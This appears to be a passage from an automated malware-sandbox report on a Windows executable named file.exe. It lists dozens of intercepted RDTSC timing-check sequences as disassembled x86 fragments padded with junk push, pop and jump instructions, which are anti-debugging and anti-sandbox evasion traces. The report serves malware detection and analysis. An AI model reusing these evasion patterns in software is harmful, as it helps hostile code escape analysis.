Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED44A2 second address: ED4527 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2CF4h], ebx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 sub ebx, dword ptr [ebp+122D2ADFh] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, 23325A8Ch 0x00000028 add ebx, dword ptr [ebp+122D19A7h] 0x0000002e mov eax, dword ptr [ebp+122D0BDDh] 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FEA44C4CAB8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007FEA44C4CAB8h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a mov dword ptr [ebp+122D320Ch], esi 0x00000070 nop 0x00000071 push edx 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6EE24 second address: E6EE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED4527 second address: ED452D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED452D second address: ED453A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FEEF second address: E7FF0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FEA44C4CABEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FF0A second address: E7FF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FEA44C7ED62h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FF1B second address: E7FF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDFC4D second address: EDFC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FEA44C7ED46h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDFC5E second address: EDFC68 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDFC68 second address: EDFC80 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA44C7ED4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDFC80 second address: EDFC8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDFC8A second address: EDFCB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FEA44C7ED46h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007FEA44C7ED46h 0x00000013 jmp 00007FEA44C7ED54h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7257B second address: E72597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FEA44C4CAB8h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF3DF second address: EDF3E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF3E5 second address: EDF3FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEA44C4CABEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF555 second address: EDF55B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF55B second address: EDF561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF6D6 second address: EDF6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FEA44C7ED46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF6E5 second address: EDF6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF6ED second address: EDF6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FEA44C7ED46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF80C second address: EDF826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF826 second address: EDF85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEA44C7ED55h 0x0000000c jmp 00007FEA44C7ED58h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF85E second address: EDF864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6CCC second address: EE6CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED54h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEB5BE second address: EEB5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEB5C2 second address: EEB604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED4Bh 0x00000007 jne 00007FEA44C7ED46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FEA44C7ED55h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 jne 00007FEA44C7ED46h 0x00000026 popad 0x00000027 push ecx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEB746 second address: EEB74C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEBA70 second address: EEBA7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA44C7ED4Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53ED second address: EF53F7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA44C4CAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4724 second address: EF472A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF472A second address: EF4732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF3F2D second address: EF3F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF3F36 second address: EF3F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4CDC second address: EF4CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED52h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4CF4 second address: EF4CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4CF8 second address: EF4CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4E28 second address: EF4E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF50F7 second address: EF5112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED53h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6899 second address: EF68AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEA44C4CABEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF68AF second address: EF68BF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA44C7ED52h 0x00000008 jne 00007FEA44C7ED46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBC39 second address: EFBC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBC41 second address: EFBC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBC45 second address: EFBC76 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA44C4CAB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FEA44C4CABDh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jl 00007FEA44C4CABEh 0x0000001a jnc 00007FEA44C4CAB6h 0x00000020 push edi 0x00000021 pop edi 0x00000022 push ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ebx 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBDFF second address: EFBE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBE03 second address: EFBE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FEA44C4CABEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBE11 second address: EFBE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBE1D second address: EFBE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBF51 second address: EFBF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBF57 second address: EFBF81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FEA44C4CAC8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FEA44C4CAB6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC0F7 second address: EFC101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEA44C7ED46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC28F second address: EFC2B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FEA44C4CAD2h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 ja 00007FEA44C4CAB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC446 second address: EFC44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC44B second address: EFC450 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5AC second address: EFC5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC718 second address: EFC71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC8D8 second address: EFC8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA44C7ED46h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FEA44C7ED4Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC8F2 second address: EFC90E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEA44C4CAC2h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA92 second address: EFCAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED58h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCAAF second address: EFCAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCEED second address: EFCEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FEA44C7ED48h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB647 second address: EFB651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA44C4CAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB651 second address: EFB655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB655 second address: EFB65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB65B second address: EFB661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB661 second address: EFB669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB8AA1 second address: EB8AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB8AA5 second address: EB8AF8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jng 00007FEA44C4CAC7h 0x00000012 jmp 00007FEA44C4CAC1h 0x00000017 nop 0x00000018 pushad 0x00000019 jmp 00007FEA44C4CABBh 0x0000001e stc 0x0000001f popad 0x00000020 lea eax, dword ptr [ebp+12481832h] 0x00000026 xor dword ptr [ebp+122D1961h], esi 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f jng 00007FEA44C4CAC2h 0x00000035 jmp 00007FEA44C4CABCh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB8BA4 second address: EB8BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FEA44C7ED46h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FEA44C7ED46h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB8BBD second address: EB8BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB9335 second address: EB9348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007FEA44C7ED54h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB9348 second address: EB934C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB95C8 second address: EB95CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB9A67 second address: EB9A8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEA44C4CAB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEA44C4CAC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F00E39 second address: F00E3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F010BB second address: F010C5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA44C4CABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F010C5 second address: F010E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FEA44C7ED55h 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F010E8 second address: F0111C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FEA44C4CAC2h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA44C4CAC9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F014E9 second address: F014ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F014ED second address: F014F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F014F7 second address: F0153A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FEA44C7ED59h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jo 00007FEA44C7ED46h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0153A second address: F0154B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0154B second address: F01558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F01558 second address: F0155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0155E second address: F01573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FEA44C7ED48h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FEA44C7ED46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79270 second address: E7928D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FEA44C4CAC2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75B7C second address: E75B9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED59h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75B9B second address: E75BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BA1 second address: E75BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BA5 second address: E75BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BAB second address: E75BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BB9 second address: E75BBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BBF second address: E75BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F096E8 second address: F096F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F096F3 second address: F096F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
